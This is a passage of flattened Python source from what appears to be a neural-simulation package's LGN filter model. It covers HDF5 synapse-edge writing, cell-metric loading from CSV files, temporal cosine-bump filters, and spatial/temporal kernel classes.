src_id, trg_id, syn_weight): self._add_conn(edge_type_id, src_id, trg_id, 1) self._pop_root['1/syn_weight'][self._n_pointsyns] = syn_weight self._n_pointsyns += 1 if self._n_pointsyns % self._block_size == 0: self._pop_root['1/syn_weight'].resize((self._n_pointsyns + self._block_size, )) def clean_ends(self): self._pop_root['source_node_id'].resize((self._nsyns,)) self._pop_root['target_node_id'].resize((self._nsyns,)) self._pop_root['edge_group_id'].resize((self._nsyns,)) self._pop_root['edge_type_id'].resize((self._nsyns,)) self._pop_root['0/syn_weight'].resize((self._n_biosyns,)) self._pop_root['0/sec_id'].resize((self._n_biosyns,)) self._pop_root['0/sec_x'].resize((self._n_biosyns,)) self._pop_root['1/syn_weight'].resize((self._n_pointsyns,)) eg_ds = self._pop_root.create_dataset('edge_group_index', (self._nsyns, ), dtype=np.uint64) bio_count, point_count = 0, 0 for idx, grp_id in enumerate(self._pop_root['edge_group_id']): if grp_id == 0: eg_ds[idx] = bio_count bio_count += 1 elif grp_id == 1: eg_ds[idx] = point_count point_count += 1 self._create_index('target') self._create_index('source') def _create_index(self, index_type='target'): if index_type == 'target': edge_nodes = np.array(self._pop_root['target_node_id'], dtype=np.int64) output_grp = self._pop_root.create_group('indices/target_to_source') elif index_type == 'source': edge_nodes = np.array(self._pop_root['source_node_id'], dtype=np.int64) output_grp = self._pop_root.create_group('indices/source_to_target') edge_nodes = np.append(edge_nodes, [-1]) n_targets = 
np.max(edge_nodes) ranges_list = [[] for _ in range(n_targets + 1)] n_ranges = 0 begin_index = 0 cur_trg = edge_nodes[begin_index] for end_index, trg_gid in enumerate(edge_nodes): if cur_trg != trg_gid: ranges_list[cur_trg].append((begin_index, end_index)) cur_trg = int(trg_gid) begin_index = end_index n_ranges += 1 node_id_to_range = np.zeros((n_targets + 1, 2)) range_to_edge_id = np.zeros((n_ranges, 2)) range_index = 0 for node_index, trg_ranges in enumerate(ranges_list): if len(trg_ranges) > 0: node_id_to_range[node_index, 0] = range_index for r in trg_ranges: range_to_edge_id[range_index, :] = r range_index += 1 node_id_to_range[node_index, 1] = range_index output_grp.create_dataset('range_to_edge_id', data=range_to_edge_id, dtype='uint64') output_grp.create_dataset('node_id_to_range', data=node_id_to_range, dtype='uint64') def close_h5(self): self._h5_file.close() def __init__(self, network_dir): self._network_dir = network_dir self._pop_groups = {} def _group_key(self, src_pop, trg_pop): return (src_pop, trg_pop) def _get_edge_group(self, src_pop, trg_pop): grp_key = self._group_key(src_pop, trg_pop) if grp_key not in self._pop_groups: pop_name = '{}_{}'.format(src_pop, trg_pop) if N_HOSTS > 1: pop_name = '.core{}.{}'.format(MPI_RANK, pop_name) file_path = os.path.join(self._network_dir, '{}_edges.h5'.format(pop_name)) self._pop_groups[grp_key] = self.H5Index(file_path, src_pop, trg_pop) return self._pop_groups[grp_key] def add_bio_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight, sec_id, sec_x): h5_grp = self._get_edge_group(src_pop, trg_pop) h5_grp.add_bio_conn(edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x) def add_point_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight): h5_grp = self._get_edge_group(src_pop, trg_pop) h5_grp.add_point_conn(edge_type_id, src_id, trg_id, syn_weight) def close(self): for _, h5index in self._pop_groups.items(): h5index.clean_ends() h5index.close_h5() ``` #### File: filternet/lgnmodel/cellmetrics.py ```python import os import numpy as np import pandas as pd class SubclassMetricsCache(object): """Used to calc optimized parameteres for different types of cells using existing data that contains cell responses to different types of stimulus. The existing data should be stored in a single directory with a csv file for reach cell type. 
usage: subcell_metrics = SubclassMetricsCache('/path/to/observations/') """ def __init__(self, saved_metrics_dir=None): self._saved_metrics_dir = saved_metrics_dir if saved_metrics_dir is not None \ else os.path.join(os.path.dirname(__file__), 'cell_metrics') self._metrics_cache = {} # subclass_name --> metrics Dataframe, stores calculated params for each cell class @property def saved_metrics_dir(self): return self._saved_metrics_dir @saved_metrics_dir.setter def saved_metrics_dir(self, path): if not os.path.isdir(path): raise FileNotFoundError('{} directory not found.'.format(path)) self._saved_metrics_dir = path def get_metrics(self, subclass_type): """Calculates various parameters for a given cell class, using observations stored in saved_metrics_dir :param subclass_type: name of cell subclass types :return: A dictionary of parameters for various types of inputs """ if subclass_type in self._metrics_cache: # See if parameters for cell type have already been calculated return self._metrics_cache[subclass_type] else: subtype_metrics = self._load_metrics(subclass_type) self._metrics_cache[subclass_type] = subtype_metrics return subtype_metrics def _load_metrics(self, ctype): # Helpter function for get_metrics, calculates subtype parameters for the given cell-class type (ctype) if ctype.find('_sus') >= 0: prs_fn = os.path.join(self.saved_metrics_dir, '{}_cells_v3.csv'.format(ctype)) else: prs_fn = os.path.join(self.saved_metrics_dir, '{}_cell_data.csv'.format(ctype)) prs_df = pd.read_csv(prs_fn) N_class, nmet = np.shape(prs_df) # Group data by subclasses based on max F0 vals exp_df = prs_df.iloc[:, [13, 14, 17, 18, 28, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54]].copy() # Bl_lat,Wh_lat,Bl_si, wh_si, spont, 5 F0s, 5 F1s sub_df = exp_df.iloc[:, [5, 6, 7, 8, 9]] exp_df['max_tf'] = sub_df.idxmax(axis=1).values # sub_df.idxmax(axis=1) exp_means = exp_df.groupby(['max_tf']).mean() exp_std = exp_df.groupby(['max_tf']).std() exp_nsub = exp_df.groupby(['max_tf']).size() max_ind_arr = np.where(exp_nsub == np.max(exp_nsub)) max_nsub_ind = max_ind_arr[0][0] # Get means and std dev for subclasses exp_prs_dict = {} for scn in np.arange(len(exp_nsub)): f0_exp = exp_means.iloc[scn, 5:10].values f1_exp = exp_means.iloc[scn, 10:].values spont_exp = exp_means.iloc[scn, 4:5].values if ctype.find('OFF') >= 0: si_exp = exp_means.iloc[scn, 2:3].values ttp_exp = exp_means.iloc[scn, 0:1].values elif ctype.find('ON') >= 0: si_exp = exp_means.iloc[scn, 3:4].values ttp_exp = exp_means.iloc[scn, 1:2].values else: si_exp = np.NaN * np.ones((1, 5)) ttp_exp = np.NaN * np.ones((1, 2)) nsub = exp_nsub.iloc[scn] if nsub == 1: f0_std = np.mean(exp_std.iloc[max_nsub_ind, 5:10].values) * np.ones((1, 5)) f1_std = np.mean(exp_std.iloc[max_nsub_ind, 10:].values) * np.ones((1, 5)) spont_std = np.mean(exp_std.iloc[max_nsub_ind, 4:5].values) * np.ones((1, 5)) if ctype.find('OFF') >= 0: si_std = np.mean(exp_std.iloc[max_nsub_ind, 2:3].values) * np.ones((1, 5)) elif ctype.find('ON') >= 0: si_std = np.mean(exp_std.iloc[max_nsub_ind, 3:4].values) * np.ones((1, 5)) else: si_std = np.NaN * np.ones((1, 5)) else: f0_std = exp_std.iloc[scn, 5:10].values f1_std = exp_std.iloc[scn, 10:].values spont_std = exp_std.iloc[scn, 4:5].values if ctype.find('OFF') >= 0: si_std = exp_std.iloc[scn, 2:3].values elif ctype.find('ON') >= 0: si_std = exp_std.iloc[scn, 3:4].values else: si_std = np.NaN * np.ones((1, 5)) if ctype.find('t') >= 0: tcross = 40. si_inf_exp = (si_exp - tcross / 200.) * (200. / (200. 
- tcross - 40.)) elif ctype.find('s') >= 0: tcross = 60. si_inf_exp = (si_exp - tcross / 200.) * (200. / (200. - tcross - 40.)) else: si_inf_exp = np.nan dict_key = exp_means.iloc[scn].name[3:] exp_prs_dict[dict_key] = {} exp_prs_dict[dict_key]['f0_exp'] = f0_exp exp_prs_dict[dict_key]['f1_exp'] = f1_exp exp_prs_dict[dict_key]['spont_exp'] = spont_exp exp_prs_dict[dict_key]['si_exp'] = si_exp exp_prs_dict[dict_key]['si_inf_exp'] = si_inf_exp exp_prs_dict[dict_key]['ttp_exp'] = ttp_exp exp_prs_dict[dict_key]['f0_std'] = f0_std exp_prs_dict[dict_key]['f1_std'] = f1_std exp_prs_dict[dict_key]['spont_std'] = spont_std exp_prs_dict[dict_key]['si_std'] = si_std exp_prs_dict[dict_key]['nsub'] = nsub exp_prs_dict[dict_key]['N_class'] = N_class return exp_prs_dict # Creates/retrives a singleton for every difference _instances = {} @classmethod def load_dir(cls, saved_metrics_dir=None): if saved_metrics_dir in cls._instances: return cls._instances[saved_metrics_dir] else: metrics = cls(saved_metrics_dir) cls._instances[saved_metrics_dir] = metrics return metrics def get_data_metrics_for_each_subclass(ctype): metrics = SubclassMetricsCache.load_dir() return metrics.get_metrics(ctype) ``` #### File: filternet/lgnmodel/fitfuns.py ```python import os from math import * import numpy as np import numpy.fft as npft def makeFitStruct_GLM(dtsim, kbasprs, nkt, flag_exp): gg = {} gg['k'] = [] gg['dc'] = 0 gg['kt'] = np.zeros((nkt,1)) gg['ktbas'] = [] gg['kbasprs'] = kbasprs gg['dt'] = dtsim nkt = nkt if flag_exp==0: ktbas = makeBasis_StimKernel(kbasprs,nkt) else: ktbas = makeBasis_StimKernel_exp(kbasprs,nkt) gg['ktbas'] = ktbas gg['k'] = gg['ktbas']*gg['kt'] return gg def makeBasis_StimKernel(kbasprs, nkt): neye = kbasprs['neye'] ncos = kbasprs['ncos'] kpeaks = kbasprs['kpeaks'] kdt = 1 b = kbasprs['b'] delays_raw = kbasprs['delays'] delays = delays_raw[0].astype(int) ylim = np.array([100.,200.]) # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!HARD-CODED FOR NOW yrnge = nlin(ylim + b*np.ones(np.shape(kpeaks))) db = (yrnge[-1]-yrnge[0])/(ncos-1) ctrs = nlin(np.array(kpeaks)) # yrnge mxt = invnl(yrnge[ncos-1]+2*db)-b kt0 = np.arange(0, mxt, kdt) # -delay nt = len(kt0) e1 = np.tile(nlin(kt0 + b*np.ones(np.shape(kt0))), (ncos, 1)) e2 = np.transpose(e1) e3 = np.tile(ctrs, (nt, 1)) kbasis0 = [] for kk in range(ncos): kbasis0.append(ff(e2[:,kk],e3[:,kk],db)) #Concatenate identity vectors nkt0 = np.size(kt0, 0) a1 = np.concatenate((np.eye(neye), np.zeros((nkt0,neye))),axis=0) a2 = np.concatenate((np.zeros((neye,ncos)),np.array(kbasis0).T),axis=0) kbasis = np.concatenate((a1, a2),axis=1) kbasis = np.flipud(kbasis) nkt0 = np.size(kbasis,0) if nkt0 < nkt: kbasis = np.concatenate((np.zeros((nkt - nkt0, ncos + neye)), kbasis), axis=0) elif nkt0 > nkt: kbasis = kbasis[-1-nkt:-1, :] kbasis = normalizecols(kbasis) # Add delays for both functions. tack on delays (array of 0s) to the end of the function, then readjusts the second # function so both are the same size. 
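# The next few lines align the two basis columns: column 0 is padded at the tail with
# delays[0] zeros and column 1 with delays[1] zeros; column 1 is then trimmed from the
# front by (delays[1] - delays[0]) so both end up with length nkt + delays[0] before
# being stacked and renormalized by normalizecols.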
kbasis2_0 = np.concatenate((kbasis[:, 0], np.zeros((delays[0], ))), axis=0) kbasis2_1 = np.concatenate((kbasis[:, 1], np.zeros((delays[1], ))), axis=0) len_diff = delays[1] - delays[0] kbasis2_1 = kbasis2_1[len_diff:] # combine and renormalize kbasis2 = np.zeros((len(kbasis2_0), 2)) kbasis2[:, 0] = kbasis2_0 kbasis2[:, 1] = kbasis2_1 kbasis2 = normalizecols(kbasis2) return kbasis2 def makeBasis_StimKernel_exp(kbasprs,nkt): ks = kbasprs['ks'] b = kbasprs['b'] x0 = np.arange(0,nkt) kbasis = np.zeros((nkt,len(ks))) for ii in range(len(ks)): kbasis[:,ii] = invnl(-ks[ii]*x0) # (1.0/ks[ii])* kbasis = np.flipud(kbasis) # kbasis = normalizecols(kbasis) return kbasis def nlin(x): eps = 1e-20 # x.clip(0.) return np.log(x+eps) def invnl(x): eps = 1e-20 return np.exp(x)-eps def ff(x, c, dc): rowsize = np.size(x,0) m = [] for i in range(rowsize): xi = x[i] ci = c[i] val=(np.cos(np.max([-pi, np.min([pi, (xi-ci)*pi/dc/2])])) + 1)/2 m.append(val) return np.array(m) def normalizecols(A): B = A/np.tile(np.sqrt(sum(A**2,0)),(np.size(A,0),1)) return B def sameconv(A,B): am = np.size(A) bm = np.size(B) nn = am+bm-1 q = npft.fft(A,nn)*npft.fft(np.flipud(B),nn) p = q G = npft.ifft(p) G = G[range(am)] return G ``` #### File: filternet/lgnmodel/kernel.py ```python import matplotlib as mpl from matplotlib import cm import numpy as np import matplotlib.pyplot as plt def find_l_r_in_t_range(t_range, t): for tl in range(len(t_range)-1): tr = tl+1 test_val = (t_range[tl]-t)*(t_range[tr]-t) if np.abs(test_val) < 1e-16: if np.abs(t_range[tl]-t) < 1e-16: return (tl,) else: return (tr,) elif test_val < 0: t_range[tl], t_range[tr], t return tl, tr def get_contour(X, Y, Z, c): contour_obj = plt.contour(X, Y, Z) res = contour_obj.trace(c) nseg = len(res) // 2 if nseg > 0: seg = res[:nseg][0] return seg[:, 0], seg[:, 1] else: return [], [] def plot_single_contour(ax, x_contour, y_contour, t, color): t_contour = t+np.zeros_like(x_contour) ax.plot(x_contour, t_contour, y_contour, zdir='z', color=color) class Kernel1D(object): def __init__(self, t_range, kernel_array, threshold=0., reverse=False): assert len(t_range) == len(kernel_array) kernel_array = np.array(kernel_array) inds_to_keep = np.where(np.abs(kernel_array) > threshold) if reverse: self.t_range = -np.array(t_range)[::-1] t_inds_tmp = inds_to_keep[0] max_t_ind = t_inds_tmp.max() reversed_t_inds = max_t_ind - t_inds_tmp self.t_inds = reversed_t_inds - max_t_ind - 1 # Had an off by one error here should be "- 1" nhc 14 Apr '17 change made in cursor evalutiate too else: self.t_range = np.array(t_range) self.t_inds = inds_to_keep[0] self.kernel = kernel_array[inds_to_keep] assert len(self.t_inds) == len(self.kernel) def rescale(self): if np.abs(self.kernel.sum())!=0: self.kernel /= np.abs(self.kernel.sum()) def normalize(self): self.kernel /= np.abs(self.kernel.sum()) def __len__(self): return len(self.kernel) def imshow(self, ax=None, show=True, save_file_name=None, ylim=None, xlim=None, color='b', reverse=True): if ax is None: _, ax = plt.subplots(1, 1) t_vals = self.t_range[self.t_inds] kernel_data = self.kernel if reverse: kernel_data = self.kernel[-1::-1] ax.plot(t_vals, kernel_data, color) ax.set_xlabel('Time (Seconds)') if ylim is not None: ax.set_ylim(ylim) if xlim is not None: ax.set_xlim(xlim) else: a, b = (t_vals[0], t_vals[-1]) ax.set_xlim(min(a, b), max(a, b)) if save_file_name is not None: ax.savefig(save_file_name, transparent=True) if show: plt.show() return ax, (t_vals, self.kernel) def full(self, truncate_t=True): data = np.zeros(len(self.t_range)) 
data[self.t_inds] = self.kernel if truncate_t: ind_min = np.where(np.abs(data) > 0)[0].min() return data[ind_min:] else: return data return data class Kernel2D(object): def __init__(self, row_range, col_range, row_inds, col_inds, kernel): self.col_range = np.array(col_range) self.row_range = np.array(row_range) self.row_inds = np.array(row_inds) self.col_inds = np.array(col_inds) self.kernel = np.array(kernel) assert len(self.row_inds) == len(self.col_inds) assert len(self.row_inds) == len(self.kernel) def rescale(self): if np.abs(self.kernel.sum()) != 0: self.kernel /= np.abs(self.kernel.sum()) def normalize(self): self.kernel /= np.abs(self.kernel.sum()) @classmethod def from_dense(cls, row_range, col_range, kernel_array, threshold=0.): col_range = np.array(col_range).copy() row_range = np.array(row_range).copy() kernel_array = np.array(kernel_array).copy() inds_to_keep = np.where(np.abs(kernel_array) > threshold) kernel = kernel_array[inds_to_keep] if len(inds_to_keep) == 1: col_inds, row_inds = np.array([]), np.array([]) else: col_inds, row_inds = inds_to_keep return cls(row_range, col_range, row_inds, col_inds, kernel) @classmethod def copy(cls, instance): return cls(instance.row_range.copy(), instance.col_range.copy(), instance.row_inds.copy(), instance.col_inds.copy(), instance.kernel.copy()) def __mul__(self, constant): new_copy = Kernel2D.copy(self) new_copy.kernel *= constant return new_copy def __add__(self, other): if len(other) == 0: return self try: np.testing.assert_almost_equal(self.row_range, other.row_range) np.testing.assert_almost_equal(self.col_range, other.col_range) except: raise Exception('Kernels must exist on same grid to be added') row_range = self.row_range.copy() col_range = self.col_range.copy() kernel_dict = {} for key, ker in zip(zip(self.row_inds, self.col_inds), self.kernel): kernel_dict[key] = kernel_dict.setdefault(key, 0) + ker for key, ker in zip(zip(other.row_inds, other.col_inds), other.kernel): kernel_dict[key] = kernel_dict.setdefault(key, 0) + ker key_list, kernel_list = zip(*kernel_dict.items()) row_inds_list, col_inds_list = zip(*key_list) row_inds = np.array(row_inds_list) col_inds = np.array(col_inds_list) kernel = np.array(kernel_list) return Kernel2D(row_range, col_range, row_inds, col_inds, kernel) def apply_threshold(self, threshold): inds_to_keep = np.where(np.abs(self.kernel) > threshold) self.row_inds = self.row_inds[inds_to_keep] self.col_inds = self.col_inds[inds_to_keep] self.kernel = self.kernel[inds_to_keep] def full(self): data = np.zeros((len(self.row_range), len(self.col_range))) data[self.row_inds, self.col_inds] = self.kernel return data def imshow(self, ax=None, show=True, save_file_name=None, clim=None, colorbar=True): from mpl_toolkits.axes_grid1 import make_axes_locatable if ax is None: _, ax = plt.subplots(1, 1) if colorbar: divider = make_axes_locatable(ax) cax = divider.append_axes("right", size="5%", pad=0.05) data = self.full() if clim is not None: im = ax.imshow(data, extent=(self.col_range[0], self.col_range[-1], self.row_range[0], self.row_range[-1]), origin='lower', clim=clim, interpolation='none') else: im = ax.imshow(data, extent=(self.col_range[0], self.col_range[-1], self.row_range[0], self.row_range[-1]), origin='lower', interpolation='none') if colorbar: plt.colorbar(im, cax=cax) if save_file_name is not None: plt.savefig(save_file_name, transparent=True) if show: plt.show() return ax, data def __len__(self): return len(self.kernel) class Kernel3D(object): def rescale(self): if np.abs(self.kernel.sum()) != 
0: self.kernel /= np.abs(self.kernel.sum()) def normalize(self): self.kernel /= (self.kernel.sum())*np.sign(self.kernel.sum()) @classmethod def copy(cls, instance): return cls(instance.row_range.copy(), instance.col_range.copy(), instance.t_range.copy(), instance.row_inds.copy(), instance.col_inds.copy(), instance.t_inds.copy(), instance.kernel.copy()) def __len__(self): return len(self.kernel) def __init__(self, row_range, col_range, t_range, row_inds, col_inds, t_inds, kernel): self.col_range = np.array(col_range) self.row_range = np.array(row_range) self.t_range = np.array(t_range) self.col_inds = np.array(col_inds) self.row_inds = np.array(row_inds) self.t_inds = np.array(t_inds) self.kernel = np.array(kernel) assert len(self.row_inds) == len(self.col_inds) assert len(self.row_inds) == len(self.t_inds) assert len(self.row_inds) == len(self.kernel) def apply_threshold(self, threshold): inds_to_keep = np.where(np.abs(self.kernel) > threshold) self.row_inds = self.row_inds[inds_to_keep] self.col_inds = self.col_inds[inds_to_keep] self.t_inds = self.t_inds[inds_to_keep] self.kernel = self.kernel[inds_to_keep] def __add__(self, other): if len(other) == 0: return self try: if not (len(self.row_range) == 0 or len(other.row_range) == 0): np.testing.assert_almost_equal(self.row_range, other.row_range) if not (len(self.col_range) == 0 or len(other.col_range) == 0): np.testing.assert_almost_equal(self.col_range, other.col_range) if not (len(self.t_range) == 0 or len(other.t_range) == 0): np.testing.assert_almost_equal(self.t_range, other.t_range) except: raise Exception('Kernels must exist on same grid to be added') if len(self.row_range) == 0: row_range = other.row_range.copy() else: row_range = self.row_range.copy() if len(self.col_range) == 0: col_range = other.col_range.copy() else: col_range = self.col_range.copy() if len(self.t_range) == 0: t_range = other.t_range.copy() else: t_range = self.t_range.copy() kernel_dict = {} for key, ker in zip(zip(self.row_inds, self.col_inds, self.t_inds), self.kernel): kernel_dict[key] = kernel_dict.setdefault(key, 0) + ker for key, ker in zip(zip(other.row_inds, other.col_inds, other.t_inds), other.kernel): kernel_dict[key] = kernel_dict.setdefault(key, 0) + ker key_list, kernel_list = zip(*kernel_dict.items()) row_inds_list, col_inds_list, t_inds_list = zip(*key_list) row_inds = np.array(row_inds_list) col_inds = np.array(col_inds_list) t_inds = np.array(t_inds_list) kernel = np.array(kernel_list) return Kernel3D(row_range, col_range, t_range, row_inds, col_inds, t_inds, kernel) def __mul__(self, constant): new_copy = Kernel3D.copy(self) new_copy.kernel *= constant return new_copy def t_slice(self, t): ind_list = find_l_r_in_t_range(self.t_range, t) if ind_list is None: return None elif len(ind_list) == 1: t_ind_i = ind_list[0] inds_i = np.where(self.t_range[self.t_inds] == self.t_range[t_ind_i]) row_inds = self.row_inds[inds_i] col_inds = self.col_inds[inds_i] kernel = self.kernel[inds_i] return Kernel2D(self.row_range, self.col_range, row_inds, col_inds, kernel) else: t_ind_l, t_ind_r = ind_list t_l, t_r = self.t_range[t_ind_l], self.t_range[t_ind_r] inds_l = np.where(self.t_range[self.t_inds] == self.t_range[t_ind_l]) inds_r = np.where(self.t_range[self.t_inds] == self.t_range[t_ind_r]) row_inds_l = self.row_inds[inds_l] col_inds_l = self.col_inds[inds_l] kernel_l = self.kernel[inds_l] kl = Kernel2D(self.row_range, self.col_range, row_inds_l, col_inds_l, kernel_l) row_inds_r = self.row_inds[inds_r] col_inds_r = self.col_inds[inds_r] kernel_r = 
self.kernel[inds_r] kr = Kernel2D(self.row_range, self.col_range, row_inds_r, col_inds_r, kernel_r) wa, wb = (1-(t-t_l)/(t_r-t_l)), (1-(t_r-t)/(t_r-t_l)) return kl*wa + kr*wb def full(self, truncate_t=True): data = np.zeros((len(self.t_range), len(self.row_range), len(self.col_range))) data[self.t_inds, self.row_inds, self.col_inds] = self.kernel if truncate_t: ind_max = np.where(np.abs(data) > 0)[0].min() return data[ind_max:, :, :] else: return data def imshow(self, ax=None, t_range=None, cmap=cm.bwr, N=10, show=True, save_file_name=None, kvals=None): if ax is None: fig = plt.figure() ax = fig.gca(projection='3d') if t_range is None: t_range = self.t_range slice_list_sparse = [self.t_slice(t) for t in t_range] slice_list = [] slice_t_list = [] for curr_slice, curr_t in zip(slice_list_sparse, t_range): if not curr_slice is None: slice_list.append(curr_slice.full()) slice_t_list.append(curr_t) all_slice_max = max(map(np.max, slice_list)) all_slice_min = min(map(np.min, slice_list)) upper_bound = max(np.abs(all_slice_max), np.abs(all_slice_min)) lower_bound = -upper_bound norm = mpl.colors.Normalize(vmin=lower_bound, vmax=upper_bound) color_mapper = cm.ScalarMappable(norm=norm, cmap=cmap).to_rgba if kvals is None: kvals = np.linspace(lower_bound, upper_bound, N) X, Y = np.meshgrid(self.row_range, self.col_range) contour_dict = {} for kval in kvals: for t_val, curr_slice in zip(slice_t_list, slice_list): x_contour, y_contour = get_contour(Y, X, curr_slice.T, kval) contour_dict[kval, t_val] = x_contour, y_contour color = color_mapper(kval) color = color[0], color[1], color[2], np.abs(kval)/upper_bound plot_single_contour(ax, x_contour, y_contour, t_val, color) ax.set_zlim(self.row_range[0], self.row_range[-1]) ax.set_ylim(self.t_range[0], self.t_range[-1]) ax.set_xlim(self.col_range[0], self.col_range[-1]) if save_file_name is not None: plt.savefig(save_file_name, transparent=True) if show: plt.show() return ax, contour_dict def merge_spatial_temporal(spatial_kernel, temporal_kernel, threshold=0): t_range = temporal_kernel.t_range spatiotemporal_kernel = np.ones((len(temporal_kernel), len(spatial_kernel))) spatiotemporal_kernel *= spatial_kernel.kernel[None, :] spatiotemporal_kernel *= temporal_kernel.kernel[:, None] spatiotemporal_kernel = spatiotemporal_kernel.reshape((np.prod(spatiotemporal_kernel.shape))) spatial_coord_array = np.empty((len(spatial_kernel), 2)) spatial_coord_array[:, 0] = spatial_kernel.col_inds spatial_coord_array[:, 1] = spatial_kernel.row_inds spatiiotemporal_coord_array = np.zeros((len(spatial_kernel)*len(temporal_kernel), 3)) spatiiotemporal_coord_array[:, 0:2] = np.kron(np.ones((len(temporal_kernel), 1)), spatial_coord_array) spatiiotemporal_coord_array[:, 2] = np.kron(temporal_kernel.t_inds, np.ones(len(spatial_kernel))) col_inds, row_inds, t_inds = map(lambda x: x.astype(np.int), spatiiotemporal_coord_array.T) kernel = Kernel3D(spatial_kernel.row_range, spatial_kernel.col_range, t_range, row_inds, col_inds, t_inds, spatiotemporal_kernel) kernel.apply_threshold(threshold) return kernel ``` #### File: filternet/lgnmodel/temporalfilter.py ```python import numpy as np import scipy.interpolate as spinterp from . 
import fitfuns from .kernel import Kernel1D class TemporalFilter(object): def __init__(self): self.t_support = [] self.kernel_data = None def imshow(self, t_range=None, threshold=0, reverse=False, rescale=False, **kwargs): return self.get_kernel(t_range, threshold, reverse, rescale).imshow(**kwargs) def to_dict(self): return {'class': (__name__, self.__class__.__name__)} def get_default_t_grid(self): raise NotImplementedError() def get_kernel(self, t_range=None, threshold=0, reverse=False, rescale=False): if t_range is None: t_range = self.get_default_t_grid() if len(self.t_support) == 1: k = Kernel1D(self.t_support, self.kernel_data, threshold=threshold, reverse=reverse) else: interpolation_function = spinterp.interp1d(self.t_support, self.kernel_data, fill_value=0, bounds_error=False, assume_sorted=True) k = Kernel1D(t_range, interpolation_function(t_range), threshold=threshold, reverse=reverse) if rescale: k.rescale() assert(np.abs(np.abs(k.kernel.sum()) - 1) < 1e-14) return k class ArrayTemporalFilter(TemporalFilter): def __init__(self, mask, t_support): super(ArrayTemporalFilter, self).__init__() self.mask = mask self.t_support = t_support assert(len(self.mask) == len(self.t_support)) self.nkt = 600 self.kernel_data = self.mask def get_default_t_grid(self): return np.arange(self.nkt)*0.001 class TemporalFilterCosineBump(TemporalFilter): def __init__(self, weights, kpeaks, delays): """Creates a time-based filter function by combining two cosine-based peaks into a function for convoluting the input with. :param weights: (float, float)the magntiude of both peaks, first weight must be positive :param kpeaks: (float, float) the spread of each peak, first peak (0) must be sharper :param delays: (float, float) the delay of both peaks, peak 0 must be positive occur first. """ assert(len(kpeaks) == 2) assert(kpeaks[0] < kpeaks[1]) assert(weights[0] > 0) assert(delays[0] <= delays[1]) super(TemporalFilterCosineBump, self).__init__() self.ncos = len(weights) # Not likely to change defaults: self.neye = 0 self.b = .3 self.nkt = 600 # Parameters self.weights = np.array([weights]).T self.kpeaks = kpeaks self.delays = np.array([delays]).astype(int) # Create two peak arrays (arr0 and arr1) using makeBasisStimKernel. Then merge them using dot product # w0*arr0 + w1*arr1. kbasprs = { 'neye': self.neye, 'ncos': self.ncos, 'kpeaks': self.kpeaks, 'b': self.b, 'delays': self.delays } nkt = self.nkt self.kernel_data = np.dot(fitfuns.makeBasis_StimKernel(kbasprs, nkt), self.weights)[::-1].T[0] self.t_support = np.arange(0, len(self.kernel_data)*.001, .001) self.kbasprs = kbasprs assert len(self.t_support) == len(self.kernel_data) def __call__(self, t): return self.interpolation_function(t) def get_default_t_grid(self): return np.arange(self.nkt)*.001 def to_dict(self): param_dict = super(TemporalFilterCosineBump, self).to_dict() param_dict.update({'weights': self.weights.tolist(), 'kpeaks': self.kpeaks}) return param_dict ``` #### File: filternet/lgnmodel/util_fns.py ```python import os import re import numpy as np import scipy.io as sio from scipy.fftpack import fft import pandas as pd from .movie import Movie, FullFieldFlashMovie pd.set_option('display.width', 1000) pd.set_option('display.max_columns', 100) ################################################# def chunks(l, n): """Yield successive n-sized chunks from l.""" for i in range(0, len(l), n): yield l[i:i + n] ################################################## def compute_FFT_OneCycle(FR, TF, downsample): one_cyc = np.int(((1000. 
/ downsample) / TF)) FR_cyc = list(chunks(FR, one_cyc)) if (TF == 15. or TF == 8.): FR_cyc = FR_cyc[:-1] FR_cyc_avg = np.mean(FR_cyc, axis=0) y = FR_cyc_avg AMP = 2 * np.abs(fft(y) / len(y)) F0 = 0.5 * AMP[0] assert (F0 - np.mean(y) < 1.e-4) F1 = AMP[1] return F0, F1 ################################################## def create_ff_mov(frame_rate, tst, tend, xrng, yrng): ff_mov_on = FullFieldFlashMovie(np.arange(xrng), np.arange(yrng), tst, tend, frame_rate=frame_rate, max_intensity=1).full(t_max=tend) # +0.5) ff_mov_off = FullFieldFlashMovie(np.arange(xrng), np.arange(yrng), tst, tend, frame_rate=frame_rate, max_intensity=-1).full(t_max=tend) # +0.5) return ff_mov_on, ff_mov_off ################################################## def create_grating_movie_list(gr_dir_name): gr_fnames = os.listdir(gr_dir_name) gr_fnames_ord = sorted(gr_fnames, key=lambda x: (int(re.sub('\D', '', x)), x)) gr_mov_list = [] for fname in gr_fnames_ord[:5]: movie_file = os.path.join(gr_dir_name, fname) m_file = sio.loadmat(movie_file) m_data_raw = m_file['mov'].T swid = np.shape(m_data_raw)[1] res = int(np.sqrt(swid / (8 * 16))) m_data = np.reshape(m_data_raw, (3000, 8 * res, 16 * res)) m1 = Movie(m_data[:500, :, :], row_range=np.linspace(0, 120, m_data.shape[1], endpoint=True), col_range=np.linspace(0, 120, m_data.shape[2], endpoint=True), frame_rate=1000.) gr_mov_list.append(m1) return gr_mov_list """ ################################################## metrics_dir = os.path.join(os.path.dirname(__file__), 'cell_metrics') def get_data_metrics_for_each_subclass(ctype): # Load csv file into dataframe if ctype.find('_sus') >= 0: prs_fn = os.path.join(metrics_dir, '{}_cells_v3.csv'.format(ctype)) else: prs_fn = os.path.join(metrics_dir, '{}_cell_data.csv'.format(ctype)) prs_df = pd.read_csv(prs_fn) N_class, nmet = np.shape(prs_df) # Group data by subclasses based on max F0 vals exp_df = prs_df.iloc[:, [13, 14, 17, 18, 28, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54]].copy() # Bl_lat,Wh_lat,Bl_si, wh_si, spont, 5 F0s, 5 F1s sub_df = exp_df.iloc[:, [5, 6, 7, 8, 9]] exp_df['max_tf'] = sub_df.idxmax(axis=1).values # sub_df.idxmax(axis=1) exp_means = exp_df.groupby(['max_tf']).mean() exp_std = exp_df.groupby(['max_tf']).std() exp_nsub = exp_df.groupby(['max_tf']).size() max_ind_arr = np.where(exp_nsub == np.max(exp_nsub)) max_nsub_ind = max_ind_arr[0][0] # Get means and std dev for subclasses exp_prs_dict = {} for scn in np.arange(len(exp_nsub)): f0_exp = exp_means.iloc[scn, 5:10].values f1_exp = exp_means.iloc[scn, 10:].values spont_exp = exp_means.iloc[scn, 4:5].values if ctype.find('OFF') >= 0: si_exp = 